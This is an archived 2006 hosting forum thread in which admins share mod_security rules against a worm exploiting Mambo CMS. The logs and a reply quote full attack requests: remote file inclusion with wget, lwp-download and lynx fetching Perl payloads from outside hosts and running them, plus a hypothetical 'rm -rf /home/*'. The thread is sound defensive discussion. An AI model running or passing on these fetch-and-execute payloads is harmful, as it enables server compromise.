The Community Forums

Interact with an entire community of cPanel & WHM users!
  1. This site uses cookies. By continuing to use this site, you are agreeing to our use of cookies. Learn More.

New Rootkit going around... ModSec Rules + More...

Discussion in 'Security' started by HostMerit, Jan 27, 2006.

  1. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    160
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    Seems like a new rootkit is going around, well many, but this one seems to be the massive one. I have made additions / made my Mod_Security rules easier to read / cleaned it up some.

    I suggest adding these new rules ASAP because on all of my servers, I'm getting many many blocked requests every hour.

    I request if any server security expert / website uses my rules to post them on their website / mod security , please give credit where credit is due.

    See the Rules below and some corresponding URLs below that.

    My new set of mod security rules is available for download directly from:
    http://www.hostmerit.com/modsec.user.conf

    There are also new rules that I have personally found by going through Apache domlogs etc, as well as new rootkits spreading, but I suggest EVERYONE add the rules below ASAP to their server.


    Code:
    # Added Jan 20 by kris from honeypot domlogs - Brand new Rootkits etc
    SecFilter "mosConfig_absolute_path"
    SecFilterSelective THE_REQUEST "tool\.gif"
    SecFilterSelective THE_REQUEST "tool25\.txt"
    SecFilter "perl\x20xx\.txt"
    SecFilter "sweet-serenity\.org"
    SecFilterSelective THE_REQUEST "sess3025"
    SecFilter "mosConfig_absolute_path=http"
    SecFilter "echo\x20YYY"
    SecFilter "cmd\.gif?"
    SecFilter "\x20bash;"
    SecFilter "200\.72\.130\.29"
    SecFilter "200\.207\.91\.25"
    SecFilter "62\.23\.221\.67"
    SecFilter "147\.142\.142\.24"
    SecFilter "62\.23\.221\.67 "
    SeCFilter "202\.143\.140\.151"
    SecFilterSelective THE_REQUEST "killop"
    SecFilterSelective THE_REQUEST "\/bash;chmod"
    
    

    This is spreading quickly, and many variable versions are out there, as seen below:
    Code:
    path" at REQUEST_URI [hostname "customerwebsite.com"] [uri "/content/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s0l4r1sr0x.com/tool.gif?&cmd=cd%20/tmp/;lwp-download%20http://www.equal.home.ro/mb.txt;perl%20mb.txt;rm%20-rf%20mb.txt*?"]
    [Thu Jan 26 08:52:59 2006] [error] [client 213.193.214.66] mod_security: Access denied with code 403. Pattern match "mosConfig_absolute_path" at REQUEST_URI [hostname "customerwebsite.com"] [uri "/content/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s0l4r1sr0x.com/tool.gif?&cmd=cd%20/tmp/;lwp-download%20http://www.equal.home.ro/mb.txt;perl%20mb.txt;rm%20-rf%20mb.txt*?"]
    [Thu Jan 26 08:53:53 2006] [error] [client 213.193.229.178] mod_security: Access denied with code 403. Pattern match "mosConfig_absolute_path" at REQUEST_URI [hostname "customerwebsite.com"] [uri "/content/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s0l4r1sr0x.com/tool.gif?&cmd=cd%20/tmp/;lwp-download%20http://www.equal.home.ro/mb.txt;perl%20mb.txt;rm%20-rf%20mb.txt*?"]
    [Thu Jan 26 08:53:53 2006] [error] [client 213.193.229.178] mod_security: Access denied with code 403. Pattern match "mosConfig_absolute_path" at REQUEST_URI [hostname "customerwebsite.com"] [uri "/content/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s0l4r1sr0x.com/tool.gif?&cmd=cd%20/tmp/;lwp-download%20http://www.equal.home.ro/mb.txt;perl%20mb.txt;rm%20-rf%20mb.txt*?"]
    [Thu Jan 26 08:56:04 2006] [error] [client 160.114.81.20] mod_security: Access denied with code 403. Pattern match "mosConfig_absolute_path" at REQUEST_URI [hostname "customerwebsite.com"] [uri "/content/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s0l4r1sr0x.com/tool.gif?&cmd=cd%20/tmp/;lwp-download%20http://www.equal.home.ro/mb.txt;perl%20mb.txt;rm%20-rf%20mb.txt*?"]
    [Thu Jan 26 08:56:04 2006] [error] [client 160.114.81.20] mod_security: Access denied with code 403. Pattern match "mosConfig_absolute_path" at REQUEST_URI [hostname "customerwebsite.com"] [uri "/content/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s0l4r1sr0x.com/tool.gif?&cmd=cd%20/tmp/;lwp-download%20http://www.equal.home.ro/mb.txt;perl%20mb.txt;rm%20-rf%20mb.txt*?"]
    [Thu Jan 26 09:26:24 2006] [error] [client 195.204.38.161] mod_security: Access denied with code 403. Pattern match "mosConfig_absolute_path" at REQUEST_URI [hostname "customerwebsite.com"] [uri "/content/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s0l4r1sr0x.com/tool.gif?&cmd=cd%20/tmp/;wget%20http://www.cuti.ch/cuti/sess3024_;perl%20sess3024_;rm%20-rf%20sess3024*?"]
    [Thu Jan 26 09:26:25 2006] [error] [client 195.204.38.161] mod_security: Access denied with code 403. Pattern match "mosConfig_absolute_path" at REQUEST_URI [hostname "customerwebsite.com"] [uri "/content/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s0l4r1sr0x.com/tool.gif?&cmd=cd%20/tmp/;wget%20http://www.cuti.ch/cuti/sess3024_;perl%20sess3024_;rm%20-rf%20sess3024*?"]
    [Thu Jan 26 09:26:45 2006] [error] [client 80.64.129.254] mod_security: Access denied with code 403. Pattern match "mosConfig_absolute_path" at REQUEST_URI [hostname "customerwebsite.com"] [uri "/content/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sweet-serenity.org/tool25.txt?&cmd=cd%20/tmp/;wget%20http://sweet-serenity.org/xx.txt;perl%20xx.txt;rm%20-rf%20xx.txt*?"]
    [Thu Jan 26 09:26:45 2006] [error] [client 80.64.129.254] mod_security: Access denied with code 403. Pattern match "mosConfig_absolute_path" at REQUEST_URI [hostname "customerwebsite.com"] [uri "/content/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sweet-serenity.org/tool25.txt?&cmd=cd%20/tmp/;wget%20http://sweet-serenity.org/xx.txt;perl%20xx.txt;rm%20-rf%20xx.txt*?"]
    [Thu Jan 26 09:27:43 2006] [error] [client 81.94.11.2] mod_security: Access denied with code 403. Pattern match "mosConfig_absolute_path" at REQUEST_URI [hostname "customerwebsite.com"] [uri "/content/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sweet-serenity.org/tool25.txt?&cmd=cd%20/tmp/;wget%20http://sweet-serenity.org/xx.txt;perl%20xx.txt;rm%20-rf%20xx.txt*?"]
    [Thu Jan 26 09:27:43 2006] [error] [client 81.94.11.2] mod_security: Access denied with code 403. Pattern match "mosConfig_absolute_path" at REQUEST_URI [hostname "customerwebsite.com"] [uri "/content/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sweet-serenity.org/tool25.txt?&cmd=cd%20/tmp/;wget%20http://sweet-serenity.org/xx.txt;perl%20xx.txt;rm%20-rf%20xx.txt*?"]
    [Thu Jan 26 09:30:53 2006] [error] [client 82.112.90.23] mod_security: Access denied with code 403. Pattern match "mosConfig_absolute_path" at REQUEST_URI [hostname "customerwebsite.com"] [uri "/content/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s0l4r1sr0x.com/tool.gif?&cmd=cd%20/tmp/;lynx%20http://www.cuti.ch/cuti/sess3024_%20>%20sess3024_;perl%20sess3024_;rm%20-rf%20sess3024*?"]
    [Thu Jan 26 09:30:53 2006] [error] [client 82.112.90.23] mod_security: Access denied with code 403. Pattern match "mosConfig_absolute_path" at REQUEST_URI [hostname "customerwebsite.com"] [uri "/content/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://www.s0l4r1sr0x.com/tool.gif?&cmd=cd%20/tmp/;lynx%20http://www.cuti.ch/cuti/sess3024_%20>%20sess3024_;perl%20sess3024_;rm%20-rf%20sess3024*?"]
    [Thu Jan 26 09:33:21 2006] [error] [client 62.75.156.220] mod_security: Access denied with code 403. Pattern match "mosConfig_absolute_path" at REQUEST_URI [hostname "customerwebsite.com"] [uri "/content/index.php?_REQUEST[option]=com_content&_REQUEST[Itemid]=1&GLOBALS=&mosConfig_absolute_path=http://sweet-serenity.org/tool25.txt?&cmd=cd%20/tmp/;wget%20http://sweet-serenity.org/xx.txt;perl%20xx.txt;rm%20-rf%20xx.txt*?"]
    
    Comments and suggestions welcome.
     
    #1 HostMerit, Jan 27, 2006
    Last edited: Jan 27, 2006
  2. simplestar

    simplestar Well-Known Member

    Joined:
    Nov 15, 2005
    Messages:
    97
    Likes Received:
    0
    Trophy Points:
    6
    Very well recommended mod_sec rules. I've been using them since your initial generous offering a few months ago :D and my logs without a doubt, show they're doing a great job. I omitted a few rules because they didn't apply to my server and just got a copy of your new rules. Thank you very much for providing them to us and will undoubtedly speak good words of your skill. :)

    BTW I'm getting them too.
    Code:
    echo;echo%20YYY;cd%20%2ftmp%3bwget%20216%2e55%2e168%2e25%2fkillop%3bchmod%20%2bx%20killop%3b%2e%2fkillo
     
  3. simplestar

    simplestar Well-Known Member

    Joined:
    Nov 15, 2005
    Messages:
    97
    Likes Received:
    0
    Trophy Points:
    6
    OMG in all that, I forgot to say 'Thank you, Kris' :eek:
     
  4. jackie46

    jackie46 BANNED

    Joined:
    Jul 25, 2005
    Messages:
    537
    Likes Received:
    0
    Trophy Points:
    0
    Most rootkits are installed via wget, perl, lynx or some other form of downloadable way. Simply restricting these and a few others would stop all of the above, wouldn't it?
     
    #4 jackie46, Jan 27, 2006
    Last edited: Jan 27, 2006
  5. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    160
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    Some yes, some no - Proof in concept:

    Instead of using wget / using perl to download and execute, what if they used another system binary, say rm and did rm -rf /home/* to which would in essence clear any file chowned by nobody and chmod 777 in /home - Between galleries alone, and poorly written PHP scripts, alot of files.

    Regardless it's a new way into your machine and a new way for unknown users to run shell code on your machine, personally I feel insecure with that ;)

    It's your choice :rolleyes:
     
    #5 HostMerit, Jan 27, 2006
    Last edited: Jan 28, 2006
  6. Myacen

    Myacen Well-Known Member

    Joined:
    Apr 6, 2002
    Messages:
    222
    Likes Received:
    0
    Trophy Points:
    16
    Cheers Kris for the updated rules.

     
  7. jackie46

    jackie46 BANNED

    Joined:
    Jul 25, 2005
    Messages:
    537
    Likes Received:
    0
    Trophy Points:
    0
    Do these work with v1.9 or are these still for 1.8?
     
  8. simplestar

    simplestar Well-Known Member

    Joined:
    Nov 15, 2005
    Messages:
    97
    Likes Received:
    0
    Trophy Points:
    6
    I'm using ModSec 1.9 and HostMerit's work fine.
     
  9. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    160
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    Both - Shouldnt have issues with either - Didnt use many 1.9 features and stripped them from the public version
     
  10. Bulent Tekcan

    Bulent Tekcan Well-Known Member

    Joined:
    May 11, 2004
    Messages:
    177
    Likes Received:
    0
    Trophy Points:
    16
    When I use that conf my server loads goes 100-110 :confused:
     
  11. MMarko

    MMarko Well-Known Member

    Joined:
    Apr 18, 2005
    Messages:
    316
    Likes Received:
    0
    Trophy Points:
    16
    There is one universal solution to these problems. Just disable wget, lynx, gcc for all users except root.
     
  12. hmm

    hmm Well-Known Member

    Joined:
    Jan 11, 2006
    Messages:
    56
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    India
    I have been hardly hit by this worm for last few days...Thanks to my mod_security rules for protecting the server...

    Basically its attacking mambo CMS but the problem here is...I was getting approx 50+ attacks in less than one minute...

    and this was making my server real slow and increasing load...

    So for me final solution was to terminate that account from server and ask the client to point their nameserver to somewhere else.. :(

    Following mod_security rule helped me...

    Code:
    SecFilterSelective THE_REQUEST "wget "
    

    but the disadvantage of mod_security is..even after deleting index.php file from that location, mod_security will show 406 error rather than letting apache show 404....

    So these bots will never know that file is gone..and the attacks does not stop....

    Deep
    Deep
     
  13. verdon

    verdon Well-Known Member

    Joined:
    Nov 1, 2003
    Messages:
    836
    Likes Received:
    2
    Trophy Points:
    18
    Location:
    Northern Ontario, Canada
    cPanel Access Level:
    Root Administrator
    That's something that's always made me a little shy of too large a set of rules. The ruleset I am using seems much simpler than HostMerit's generous contribution, and HostMerit's seem much simpler than those at gotroot.com. My server load is good. I have read lot's of posts cautioning and complaining of high server loads when using something as extensive as gotroot.com's. I wish I knew how much is going to be too much :) I'm fortunate in that my company manages most of the 100 or so domains on our server, and I know for sure exactly what is and isn't installed, and don't have to worry about attacks at some specific things.

    Still... would be nice to know how many rules is going to be too much. There probably so many other variables on server load that you'd really have to just try and watch and then try some more and repeat :)
     
  14. hmm

    hmm Well-Known Member

    Joined:
    Jan 11, 2006
    Messages:
    56
    Likes Received:
    0
    Trophy Points:
    6
    Location:
    India
    actually I am also afraid to use large ruleset because of load problem...(still this single wget rule also caused high load on my server)

    I use simple ruleset provided here
     
  15. verdon

    verdon Well-Known Member

    Joined:
    Nov 1, 2003
    Messages:
    836
    Likes Received:
    2
    Trophy Points:
    18
    Location:
    Northern Ontario, Canada
    cPanel Access Level:
    Root Administrator
    Me too pretty much... with a couple things I picked up here and there.
     
  16. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    160
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    If you'll see some of eth0's rules were direct pulls of mine, so essentially you're still using my rules :p

    One of my servers is a Dual Xeon and has around 700 domains with no issue with this configuration, load only goes above 1 during backups and updatedb.

    I used to have a much larger config, this one is acutally stripped down alot.

    If it doesnt work for you dont use it :D
     
  17. verdon

    verdon Well-Known Member

    Joined:
    Nov 1, 2003
    Messages:
    836
    Likes Received:
    2
    Trophy Points:
    18
    Location:
    Northern Ontario, Canada
    cPanel Access Level:
    Root Administrator
    Please don't misunderstand me, I appreciate your effort :) I have been looking at them and likely will try at least parts of them, if not all. They seem well thought out and are well commented. I can see which ones are probably unnecessary for my particular server, so I suppose I might as well comment them out.

    salut,
     
  18. verdon

    verdon Well-Known Member

    Joined:
    Nov 1, 2003
    Messages:
    836
    Likes Received:
    2
    Trophy Points:
    18
    Location:
    Northern Ontario, Canada
    cPanel Access Level:
    Root Administrator
    FYI... I've been trying the rules for a few hours now, and see no significant increase in CPU load (maybe a tiny one but negligible) or any obvious problems. Thanks Kris :)

    I did see one side effect though...

    There is a rule just below the fantastico stuff that reads
    SecFilterSelective THE_REQUEST "cp\x20"

    I discovered by coincidence that one of my clients has an old CMS that allows them to upload images for content, without cleaning spaces and such out of the names. They have a number of images in their site that just happen to be named along the lines of 'CP Station Oct 04 002.jpg' and 'CP Station Oct 04 003.jpg' and so on. These translate to 'CP%20Station%20Oct%2004%20002.jpg' at request time and trigger the mod_security block.

    So, here's an opportunity for a question...

    Is this a case I should be able to add some sort of exclusion near the top?

    regards,
     
  19. Spiral

    Spiral BANNED

    Joined:
    Jun 24, 2005
    Messages:
    2,023
    Likes Received:
    7
    Trophy Points:
    0
    Just a little trick I use when deleting accounts ....

    I tell the server to leave the DNS for the web account that I delete and
    then edit the DNS file and change all IP numbers to "0.0.0.0".

    Anyone attempting to connect to that domain will get a resolution of "0.0.0.0"
    and since that is what is returned on DNS resolution failures, their
    computers will assume that no IP could be found for the domain
    and not even attempt any web connection to your server.

    If you just delete everything then you will still get a large amount of
    traffic trying to directly connect to the IP number where that site used
    to be located even after the site and the DNS are deleted. However,
    if you do what I said above then that excess traffic will taper off
    and disappear very quickly -- sometimes within minutes.
     
  20. HostMerit

    HostMerit Well-Known Member

    Joined:
    Oct 24, 2004
    Messages:
    160
    Likes Received:
    0
    Trophy Points:
    16
    Location:
    New Jersey, USA
    cPanel Access Level:
    DataCenter Provider
    Why not change it to 127.0.0.1 thats what I have done to a domains that were being pounded, reroute the traffic to the local server resulting in a higher and higher CPU load for the server attacking? Seems more fun than 0.0.0.0 to me.

    :rolleyes:
     
Loading...

Share This Page